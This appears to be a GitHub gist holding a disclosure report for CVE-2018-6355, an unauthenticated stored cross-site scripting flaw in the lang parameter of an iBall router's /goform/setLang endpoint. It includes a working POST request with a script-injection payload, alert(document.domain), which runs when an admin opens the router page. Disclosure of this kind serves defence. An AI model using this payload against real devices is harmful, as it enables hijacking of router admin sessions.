Instantly share code, notes, and snippets.

Embed
What would you like to do?
Stored XSS in iBall router CVE-2018-6355
> /goform/setLang on iBall 300M devices with "iB-WRB302N_1.0.1-Sep 8
> 2017" firmware has Unauthenticated Stored Cross Site Scripting via the
> lang parameter.
>
> ------------------------------------------
>
> [Additional Information]
> Below find the Vulnerable POST request
>
> POST /goform/setLang HTTP/1.1
> Cookie: bLanguage=en
>
> lang=en";</script><script>alert(document.domain);</script>
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Scripting (XSS)
>
> ------------------------------------------
>
> [Vendor of Product]
> iBall
>
> ------------------------------------------
>
> [Affected Product Code Base]
> 300M 2-Port Wireless-N Broadband Router - iB-WRB302N_1.0.1-Sep 8 2017
>
> ------------------------------------------
>
> [Affected Component]
> iBall 300M 2-Port Wireless-N Broadband Router is affected by Stored Cross Site
> Scripting - "lang" parameter is vulnerable for XSS
>
> ------------------------------------------
>
> [Attack Type]
> Local
>
> ------------------------------------------
>
> [Impact Code execution]
> true
>
> ------------------------------------------
>
> [Impact Denial of Service]
> true
>
> ------------------------------------------
>
> [Impact Information Disclosure]
> true
>
> ------------------------------------------
>
> [Attack Vectors]
> An unauthenticated attacker will set lang parameter to
> "lang=en";</script><script>alert(document.domain);</script>" - the
> JavaScript will be stored in the router homepage. Whenever an admin goes
> to the router gateway (i.e., 192.168.1.1), stored XSS will execute.
>
> ------------------------------------------
>
> [Discoverer]
> Mayur Udiniya
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment